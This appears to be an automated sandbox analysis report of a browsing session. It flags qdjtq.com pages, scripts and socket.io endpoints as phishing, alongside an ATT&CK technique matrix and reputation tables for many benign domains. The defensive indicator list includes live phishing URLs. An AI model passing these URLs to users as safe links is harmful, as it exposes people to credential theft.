Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://qdjtq.com/modify/100%Avira URL Cloudphishing
https://qdjtq.com/modify/18%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
scontent.xx.fbcdn.net0%VirustotalBrowse
forms.hsforms.com0%VirustotalBrowse
qdjtq.com0%VirustotalBrowse
stats.g.doubleclick.net0%VirustotalBrowse
code.jquery.com1%VirustotalBrowse
fp2e7a.wpc.phicdn.net0%VirustotalBrowse
js.hs-analytics.net0%VirustotalBrowse
script.hotjar.com0%VirustotalBrowse
owlcarousel2.github.io0%VirustotalBrowse
track.hubspot.com0%VirustotalBrowse
cdnjs.cloudflare.com0%VirustotalBrowse
www.google.com0%VirustotalBrowse
mobile.servientrega.com0%VirustotalBrowse
star-mini.c10r.facebook.com0%VirustotalBrowse
static-cdn.hotjar.com0%VirustotalBrowse
js.hs-banner.com0%VirustotalBrowse
js.hs-scripts.com0%VirustotalBrowse
bg.microsoft.map.fastly.net0%VirustotalBrowse
forms.hscollectedforms.net0%VirustotalBrowse
td.doubleclick.net0%VirustotalBrowse
uzer.co0%VirustotalBrowse
windowsupdatebg.s.llnwi.net1%VirustotalBrowse
googleads.g.doubleclick.net0%VirustotalBrowse
maxcdn.bootstrapcdn.com0%VirustotalBrowse
analytics.google.com0%VirustotalBrowse
s.go-mpulse.net0%VirustotalBrowse
www.linkedin.com0%VirustotalBrowse
cdn.jsdelivr.net0%VirustotalBrowse
unpkg.com0%VirustotalBrowse
connect.facebook.net0%VirustotalBrowse
px.ads.linkedin.com0%VirustotalBrowse
static.hotjar.com0%VirustotalBrowse
www.facebook.com0%VirustotalBrowse
js.hscollectedforms.net0%VirustotalBrowse
c.go-mpulse.net0%VirustotalBrowse
snap.licdn.com0%VirustotalBrowse
use.fontawesome.com0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://stats.g.doubleclick.net/g/collect0%URL Reputationsafe
https://ampcid.google.com/v1/publisher:getClientId0%URL Reputationsafe
https://fontawesome.com0%URL Reputationsafe
https://stats.g.doubleclick.net/j/collect0%URL Reputationsafe
https://schema.org0%URL Reputationsafe
https://connect.facebook.net/0%URL Reputationsafe
https://fontawesome.com/license/free0%URL Reputationsafe
http://daneden.me/animate0%URL Reputationsafe
https://uzer.co/error.html0%Avira URL Cloudsafe
https://clutch.co/profile/uzer-0#review-19563010%Avira URL Cloudsafe
https://vimeo.com/groups/:group/videos/:id0%Avira URL Cloudsafe
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8munRy&sid=jnmURHTecJrkHRFxAHuG100%Avira URL Cloudphishing
https://www.instagram.com/UZER_co/0%Avira URL Cloudsafe
https://qdjtq.com/modify/assets/d1a234c2ajMSD.js100%Avira URL Cloudphishing
https://qdjtq.com/modify/assets/c27b6911ajMSD.js100%Avira URL Cloudphishing
https://uzer.co/images/port5-m.png0%Avira URL Cloudsafe
https://youtu.be/:id0%Avira URL Cloudsafe
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muaSX100%Avira URL Cloudphishing
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mum-H&sid=jnmURHTecJrkHRFxAHuG100%Avira URL Cloudphishing
https://uzer.co/images/port7.png0%Avira URL Cloudsafe
http://modernizr.com/download/#-csstransforms-csstransforms3d-shiv-cssclasses-prefixed-teststyles-te0%Avira URL Cloudsafe
https://www.facebook.com/tr/?id=303367017008635&ev=PageView&dl=https%3A%2F%2Fmobile.servientrega.com%2FWebSitePortal%2FRastreoEnvio.html&rl=https%3A%2F%2Fwww.servientrega.com%2F&if=true&ts=1727397023311&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397023305.409210438132465739&cs_est=true&ler=other&cdl=API_unavailable&it=1727397021957&coo=false&rqm=GET0%Avira URL Cloudsafe
https://qdjtq.com/modify/assets/297557e4tE5dP.css100%Avira URL Cloudphishing
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mudzw&sid=RcIlUwyZYMmWAnsPAHt1100%Avira URL Cloudphishing
https://www.uzer.co/0%Avira URL Cloudsafe
https://qdjtq.com/modify/layout/images/68.svg100%Avira URL Cloudphishing
https://github.com/twbs/bootstrap/graphs/contributors)0%Avira URL Cloudsafe
https://mobile.servientrega.com/WebSitePortal/assets/css/plug.min.css0%Avira URL Cloudsafe
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mukbh&sid=EAVYAwv8c3Wq9ksAAHuA100%Avira URL Cloudphishing
https://clutch.co/profile/uzer-0#review-19552200%Avira URL Cloudsafe
https://uzer.co/css/style.css0%Avira URL Cloudsafe
https://uzer.co/images/ico-procesos-03.svg0%Avira URL Cloudsafe
https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=_2bdYdjJ6QcQscIJAHty100%Avira URL Cloudphishing
https://cdn.jsdelivr.net/npm/vanilla-lazyload0%Avira URL Cloudsafe
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muq3U&sid=yXWikhQOZczjci5kAHuJ100%Avira URL Cloudphishing
https://qdjtq.com/modify/layout/images/56.svg100%Avira URL Cloudphishing
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mujOQ&sid=cG417RpQ48wOMxxtAHt7100%Avira URL Cloudphishing
https://uzer.co/images/uzer-heading-bg-2024.jpg0%Avira URL Cloudsafe
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
https://uzer.co/images/ico-procesos-cta.svg0%Avira URL Cloudsafe
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mufNo&sid=N4xB_A2KRU780xSdAHt4100%Avira URL Cloudphishing
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mubv1&sid=_2bdYdjJ6QcQscIJAHty100%Avira URL Cloudphishing
https://uzer.co/js/modernizr.js0%Avira URL Cloudsafe
https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=cjtByYZSYtIZzkm5AHts100%Avira URL Cloudphishing
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mum-M&sid=jnmURHTecJrkHRFxAHuG100%Avira URL Cloudphishing
https://cdnjs.cloudflare.com/ajax/libs/Sly/1.6.1/sly.min.js0%Avira URL Cloudsafe
https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=RcIlUwyZYMmWAnsPAHt1100%Avira URL Cloudphishing
https://qdjtq.com/modify/layout/images/53.svg100%Avira URL Cloudphishing
https://clutch.co/profile/uzer-0#review-19259410%Avira URL Cloudsafe
https://uzer.co/images/port6-m.png0%Avira URL Cloudsafe
https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=3E0SqkwJomtmg_wKAHtv100%Avira URL Cloudphishing
https://uzer.co/images/design-thinking-home.png0%Avira URL Cloudsafe
https://uzer.co/images/imagen-blog-01.png0%Avira URL Cloudsafe
https://uzer.co/images/port3.png0%Avira URL Cloudsafe
https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=yXWikhQOZczjci5kAHuJ100%Avira URL Cloudphishing
https://app.vzaar.com/videos/:id0%Avira URL Cloudsafe
https://cdn.jsdelivr.net/gh/Wruczek/Bootstrap-Cookie-Alert0%Avira URL Cloudsafe
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muoqp100%Avira URL Cloudphishing
https://qdjtq.com/favicon.ico100%Avira URL Cloudphishing
https://qdjtq.com/api/MC4yMTY3NjQ0NTM3Mjk2OTA5100%Avira URL Cloudphishing
https://noticias.uzer.co/uzer-premiada-como-mejor-agencia-de-consultoria-y-diseno-ux-de-latinoameric0%Avira URL Cloudsafe
https://twitter.com/xtrategyco0%Avira URL Cloudsafe
https://github.com/twbs/bootstrap/blob/master/LICENSE)0%Avira URL Cloudsafe
https://qdjtq.com/modify/layout/images/64.svg100%Avira URL Cloudphishing
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mukbn&sid=EAVYAwv8c3Wq9ksAAHuA100%Avira URL Cloudphishing
https://js-na1.hs-scripts.com/22144436.js0%Avira URL Cloudsafe
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mucF3&sid=_2bdYdjJ6QcQscIJAHty100%Avira URL Cloudphishing
https://js.hs-analytics.net/analytics/1727397000000/22144436.js0%Avira URL Cloudsafe
http://www.hubspot.com0%Avira URL Cloudsafe
https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=jnmURHTecJrkHRFxAHuG100%Avira URL Cloudphishing
https://twitter.com/intent/tweet?text=0%Avira URL Cloudsafe
https://uzer.co/images/port1-m.png0%Avira URL Cloudsafe
https://connect.facebook.net/signals/config/524515998044999?v=2.9.168&r=stable&domain=uzer.co&hme=3ba426d944c98eb3ce406a0f93fc097d0320a486b65b445a33b2eda3a5aa3429&ex_m=70%2C119%2C105%2C109%2C61%2C4%2C98%2C69%2C16%2C95%2C87%2C51%2C54%2C170%2C173%2C185%2C181%2C182%2C184%2C29%2C99%2C53%2C76%2C183%2C165%2C168%2C178%2C179%2C186%2C129%2C41%2C34%2C141%2C15%2C50%2C192%2C191%2C131%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C91%2C17%2C14%2C94%2C90%2C89%2C106%2C52%2C108%2C39%2C107%2C30%2C92%2C26%2C166%2C169%2C138%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C74%2C100%2C27%2C75%2C9%2C8%2C79%2C48%2C21%2C102%2C101%2C103%2C96%2C10%2C20%2C3%2C38%2C19%2C84%2C56%2C82%2C33%2C73%2C0%2C93%2C32%2C81%2C86%2C47%2C46%2C85%2C37%2C5%2C88%2C80%2C44%2C35%2C83%2C2%2C36%2C63%2C42%2C104%2C45%2C78%2C68%2C110%2C60%2C59%2C31%2C97%2C58%2C55%2C49%2C77%2C72%2C24%2C1110%Avira URL Cloudsafe
https://qdjtq.com/modify/layout/images/57.svg100%Avira URL Cloudphishing
https://wa.me/573115564271?text=Hola0%Avira URL Cloudsafe
https://vimeo.com/channels/:channel/:id0%Avira URL Cloudsafe
https://js.hs-banner.com/v20%Avira URL Cloudsafe
https://qdjtq.com/modify/assets/beb21690tE5dP.css100%Avira URL Cloudphishing
https://qdjtq.com/modify/layout/images/67.svg100%Avira URL Cloudphishing
https://cdn.jsdelivr.net/jquery.validation/1.16.0/jquery.validate.min.js0%Avira URL Cloudsafe
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muiHw&sid=cG417RpQ48wOMxxtAHt7100%Avira URL Cloudphishing
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mur3m&sid=VLhOORCLSY2MXW0LAHuP100%Avira URL Cloudphishing
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mulcg&sid=UFk3GnhaSs1mLKgMAHuD100%Avira URL Cloudphishing
https://qdjtq.com/modify/assets/7f8692c3ajMSD.js100%Avira URL Cloudphishing
https://uzer.co/images/design-sprints-home.png0%Avira URL Cloudsafe
https://mobile.servientrega.com/WebSitePortal/assets/css/app.css0%Avira URL Cloudsafe
https://js.hscollectedforms.net/collectedforms.js0%Avira URL Cloudsafe
https://uzer.co/js/forms.js0%Avira URL Cloudsafe
https://www.google.com/recaptcha/api.js0%Avira URL Cloudsafe
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muYmb&sid=cjtByYZSYtIZzkm5AHts100%Avira URL Cloudphishing
https://qdjtq.com/modify/assets/e4b62962ajMSD.js100%Avira URL Cloudphishing
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mubYv100%Avira URL Cloudphishing
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muf1I100%Avira URL Cloudphishing
https://uzer.co/en0%Avira URL Cloudsafe
https://uzer.co/images/port6.png0%Avira URL Cloudsafe
http://www.linkedin.com/shareArticle?url=0%Avira URL Cloudsafe
https://qdjtq.com/modify/assets/ee4b0686tE5dP.css100%Avira URL Cloudphishing
https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muehQ&sid=RcIlUwyZYMmWAnsPAHt1100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
forms.hsforms.com
104.18.80.204
truefalseunknown
qdjtq.com
129.226.167.139
truefalseunknown
js.hs-analytics.net
104.17.175.201
truefalseunknown
fp2e7a.wpc.phicdn.net
192.229.221.95
truefalseunknown
stats.g.doubleclick.net
66.102.1.155
truefalseunknown
owlcarousel2.github.io
185.199.108.153
truefalseunknown
scontent.xx.fbcdn.net
157.240.253.1
truefalseunknown
track.hubspot.com
104.16.118.116
truefalseunknown
code.jquery.com
151.101.66.137
truefalseunknown
script.hotjar.com
13.33.187.74
truefalseunknown
forms.hscollectedforms.net
104.16.111.254
truefalseunknown
mobile.servientrega.com
190.131.194.151
truefalseunknown
cdnjs.cloudflare.com
104.17.24.14
truefalseunknown
js.hs-scripts.com
104.16.140.209
truefalseunknown
www.google.com
142.250.181.228
truefalseunknown
windowsupdatebg.s.llnwi.net
87.248.204.0
truefalseunknown
static-cdn.hotjar.com
18.66.102.106
truefalseunknown
star-mini.c10r.facebook.com
157.240.0.35
truefalseunknown
js.hs-banner.com
104.18.40.240
truefalseunknown
uzer.co
84.32.84.113
truefalseunknown
maxcdn.bootstrapcdn.com
104.18.10.207
truefalseunknown
sth0d7m9clo4y72mjm8vh3.s.decidata.tv
18.173.205.50
truefalse
    unknown
    bg.microsoft.map.fastly.net
    199.232.210.172
    truefalseunknown
    googleads.g.doubleclick.net
    142.250.186.34
    truefalseunknown
    analytics.google.com
    172.217.18.14
    truefalseunknown
    td.doubleclick.net
    142.250.184.194
    truefalseunknown
    unpkg.com
    104.17.248.203
    truefalseunknown
    js.hscollectedforms.net
    104.16.111.254
    truefalseunknown
    s.go-mpulse.net
    unknown
    unknownfalseunknown
    cdn.jsdelivr.net
    unknown
    unknownfalseunknown
    use.fontawesome.com
    unknown
    unknownfalseunknown
    static.hotjar.com
    unknown
    unknownfalseunknown
    www.facebook.com
    unknown
    unknownfalseunknown
    www.linkedin.com
    unknown
    unknownfalseunknown
    connect.facebook.net
    unknown
    unknownfalseunknown
    px.ads.linkedin.com
    unknown
    unknownfalseunknown
    tracker.metricool.com
    unknown
    unknownfalse
      unknown
      snap.licdn.com
      unknown
      unknownfalseunknown
      www.servientrega.com
      unknown
      unknownfalse
        unknown
        c.go-mpulse.net
        unknown
        unknownfalseunknown
        NameMaliciousAntivirus DetectionReputation
        https://uzer.co/error.htmlfalse
        • Avira URL Cloud: safe
        unknown
        https://qdjtq.com/modify/true
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8munRy&sid=jnmURHTecJrkHRFxAHuGfalse
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/modify/assets/d1a234c2ajMSD.jstrue
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/modify/assets/c27b6911ajMSD.jstrue
          • Avira URL Cloud: phishing
          unknown
          https://uzer.co/images/port5-m.pngfalse
          • Avira URL Cloud: safe
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muaSXfalse
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mum-H&sid=jnmURHTecJrkHRFxAHuGfalse
          • Avira URL Cloud: phishing
          unknown
          https://uzer.co/images/port7.pngfalse
          • Avira URL Cloud: safe
          unknown
          https://www.facebook.com/tr/?id=303367017008635&ev=PageView&dl=https%3A%2F%2Fmobile.servientrega.com%2FWebSitePortal%2FRastreoEnvio.html&rl=https%3A%2F%2Fwww.servientrega.com%2F&if=true&ts=1727397023311&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397023305.409210438132465739&cs_est=true&ler=other&cdl=API_unavailable&it=1727397021957&coo=false&rqm=GETfalse
          • Avira URL Cloud: safe
          unknown
          https://qdjtq.com/modify/assets/297557e4tE5dP.csstrue
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/modify/layout/images/68.svgtrue
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mudzw&sid=RcIlUwyZYMmWAnsPAHt1false
          • Avira URL Cloud: phishing
          unknown
          https://mobile.servientrega.com/WebSitePortal/assets/css/plug.min.cssfalse
          • Avira URL Cloud: safe
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mukbh&sid=EAVYAwv8c3Wq9ksAAHuAfalse
          • Avira URL Cloud: phishing
          unknown
          https://uzer.co/css/style.cssfalse
          • Avira URL Cloud: safe
          unknown
          https://uzer.co/images/ico-procesos-03.svgfalse
          • Avira URL Cloud: safe
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=_2bdYdjJ6QcQscIJAHtyfalse
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muq3U&sid=yXWikhQOZczjci5kAHuJfalse
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/modify/layout/images/56.svgtrue
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mujOQ&sid=cG417RpQ48wOMxxtAHt7false
          • Avira URL Cloud: phishing
          unknown
          https://uzer.co/images/uzer-heading-bg-2024.jpgfalse
          • Avira URL Cloud: safe
          unknown
          https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssfalse
          • Avira URL Cloud: safe
          unknown
          https://uzer.co/images/ico-procesos-cta.svgfalse
          • Avira URL Cloud: safe
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mubv1&sid=_2bdYdjJ6QcQscIJAHtyfalse
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mufNo&sid=N4xB_A2KRU780xSdAHt4false
          • Avira URL Cloud: phishing
          unknown
          https://uzer.co/js/modernizr.jsfalse
          • Avira URL Cloud: safe
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=cjtByYZSYtIZzkm5AHtsfalse
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mum-M&sid=jnmURHTecJrkHRFxAHuGfalse
          • Avira URL Cloud: phishing
          unknown
          https://cdnjs.cloudflare.com/ajax/libs/Sly/1.6.1/sly.min.jsfalse
          • Avira URL Cloud: safe
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=RcIlUwyZYMmWAnsPAHt1false
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/modify/layout/images/53.svgtrue
          • Avira URL Cloud: phishing
          unknown
          https://uzer.co/images/port6-m.pngfalse
          • Avira URL Cloud: safe
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=3E0SqkwJomtmg_wKAHtvfalse
          • Avira URL Cloud: phishing
          unknown
          https://uzer.co/images/design-thinking-home.pngfalse
          • Avira URL Cloud: safe
          unknown
          https://uzer.co/images/imagen-blog-01.pngfalse
          • Avira URL Cloud: safe
          unknown
          https://uzer.co/images/port3.pngfalse
          • Avira URL Cloud: safe
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=yXWikhQOZczjci5kAHuJfalse
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muoqpfalse
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/favicon.icofalse
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/api/MC4yMTY3NjQ0NTM3Mjk2OTA5false
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/modify/layout/images/64.svgtrue
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mukbn&sid=EAVYAwv8c3Wq9ksAAHuAfalse
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mucF3&sid=_2bdYdjJ6QcQscIJAHtyfalse
          • Avira URL Cloud: phishing
          unknown
          https://js.hs-analytics.net/analytics/1727397000000/22144436.jsfalse
          • Avira URL Cloud: safe
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=websocket&sid=jnmURHTecJrkHRFxAHuGfalse
          • Avira URL Cloud: phishing
          unknown
          https://uzer.co/images/port1-m.pngfalse
          • Avira URL Cloud: safe
          unknown
          https://connect.facebook.net/signals/config/524515998044999?v=2.9.168&r=stable&domain=uzer.co&hme=3ba426d944c98eb3ce406a0f93fc097d0320a486b65b445a33b2eda3a5aa3429&ex_m=70%2C119%2C105%2C109%2C61%2C4%2C98%2C69%2C16%2C95%2C87%2C51%2C54%2C170%2C173%2C185%2C181%2C182%2C184%2C29%2C99%2C53%2C76%2C183%2C165%2C168%2C178%2C179%2C186%2C129%2C41%2C34%2C141%2C15%2C50%2C192%2C191%2C131%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C91%2C17%2C14%2C94%2C90%2C89%2C106%2C52%2C108%2C39%2C107%2C30%2C92%2C26%2C166%2C169%2C138%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C74%2C100%2C27%2C75%2C9%2C8%2C79%2C48%2C21%2C102%2C101%2C103%2C96%2C10%2C20%2C3%2C38%2C19%2C84%2C56%2C82%2C33%2C73%2C0%2C93%2C32%2C81%2C86%2C47%2C46%2C85%2C37%2C5%2C88%2C80%2C44%2C35%2C83%2C2%2C36%2C63%2C42%2C104%2C45%2C78%2C68%2C110%2C60%2C59%2C31%2C97%2C58%2C55%2C49%2C77%2C72%2C24%2C111false
          • Avira URL Cloud: safe
          unknown
          https://qdjtq.com/modify/layout/images/57.svgtrue
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/modify/assets/beb21690tE5dP.csstrue
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/modify/layout/images/67.svgtrue
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muiHw&sid=cG417RpQ48wOMxxtAHt7false
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mur3m&sid=VLhOORCLSY2MXW0LAHuPfalse
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mulcg&sid=UFk3GnhaSs1mLKgMAHuDfalse
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/modify/assets/7f8692c3ajMSD.jstrue
          • Avira URL Cloud: phishing
          unknown
          https://uzer.co/images/design-sprints-home.pngfalse
          • Avira URL Cloud: safe
          unknown
          https://mobile.servientrega.com/WebSitePortal/assets/css/app.cssfalse
          • Avira URL Cloud: safe
          unknown
          https://js.hscollectedforms.net/collectedforms.jsfalse
          • Avira URL Cloud: safe
          unknown
          https://uzer.co/js/forms.jsfalse
          • Avira URL Cloud: safe
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muYmb&sid=cjtByYZSYtIZzkm5AHtsfalse
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/modify/assets/e4b62962ajMSD.jstrue
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8mubYvfalse
          • Avira URL Cloud: phishing
          unknown
          https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muf1Ifalse
          • Avira URL Cloud: phishing
          unknown
          https://uzer.co/images/port6.pngfalse
          • Avira URL Cloud: safe
          unknown
          https://uzer.co/false
            unknown
            https://qdjtq.com/modify/assets/ee4b0686tE5dP.csstrue
            • Avira URL Cloud: phishing
            unknown
            https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8muehQ&sid=RcIlUwyZYMmWAnsPAHt1false
            • Avira URL Cloud: phishing
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://clutch.co/profile/uzer-0#review-1956301chromecache_429.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://stats.g.doubleclick.net/g/collectchromecache_510.2.dr, chromecache_428.2.dr, chromecache_325.2.dr, chromecache_520.2.drfalse
            • URL Reputation: safe
            unknown
            https://vimeo.com/groups/:group/videos/:idchromecache_443.2.dr, chromecache_175.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://www.instagram.com/UZER_co/chromecache_429.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://ampcid.google.com/v1/publisher:getClientIdchromecache_383.2.dr, chromecache_366.2.dr, chromecache_330.2.drfalse
            • URL Reputation: safe
            unknown
            https://youtu.be/:idchromecache_443.2.dr, chromecache_175.2.drfalse
            • Avira URL Cloud: safe
            unknown
            http://modernizr.com/download/#-csstransforms-csstransforms3d-shiv-cssclasses-prefixed-teststyles-techromecache_279.2.dr, chromecache_503.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://fontawesome.comchromecache_241.2.drfalse
            • URL Reputation: safe
            unknown
            https://www.uzer.co/chromecache_429.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://github.com/twbs/bootstrap/graphs/contributors)chromecache_257.2.dr, chromecache_481.2.dr, chromecache_427.2.dr, chromecache_438.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://clutch.co/profile/uzer-0#review-1955220chromecache_429.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://cdn.jsdelivr.net/npm/vanilla-lazyloadchromecache_440.2.dr, chromecache_429.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://stats.g.doubleclick.net/j/collectchromecache_330.2.drfalse
            • URL Reputation: safe
            unknown
            https://clutch.co/profile/uzer-0#review-1925941chromecache_429.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://schema.orgchromecache_440.2.dr, chromecache_429.2.drfalse
            • URL Reputation: safe
            unknown
            https://app.vzaar.com/videos/:idchromecache_443.2.dr, chromecache_175.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://cdn.jsdelivr.net/gh/Wruczek/Bootstrap-Cookie-Alertchromecache_429.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://connect.facebook.net/chromecache_396.2.dr, chromecache_490.2.dr, chromecache_181.2.drfalse
            • URL Reputation: safe
            unknown
            https://noticias.uzer.co/uzer-premiada-como-mejor-agencia-de-consultoria-y-diseno-ux-de-latinoamericchromecache_429.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://twitter.com/xtrategycochromecache_440.2.dr, chromecache_429.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_303.2.dr, chromecache_257.2.dr, chromecache_438.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://js-na1.hs-scripts.com/22144436.jschromecache_227.2.dr, chromecache_343.2.drfalse
            • Avira URL Cloud: safe
            unknown
            http://www.hubspot.comchromecache_227.2.dr, chromecache_529.2.dr, chromecache_295.2.dr, chromecache_343.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://twitter.com/intent/tweet?text=chromecache_509.2.dr, chromecache_184.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://wa.me/573115564271?text=Holachromecache_440.2.dr, chromecache_429.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://vimeo.com/channels/:channel/:idchromecache_443.2.dr, chromecache_175.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://js.hs-banner.com/v2chromecache_529.2.dr, chromecache_295.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://cdn.jsdelivr.net/jquery.validation/1.16.0/jquery.validate.min.jschromecache_429.2.drfalse
            • Avira URL Cloud: safe
            unknown
            https://fontawesome.com/license/freechromecache_241.2.drfalse
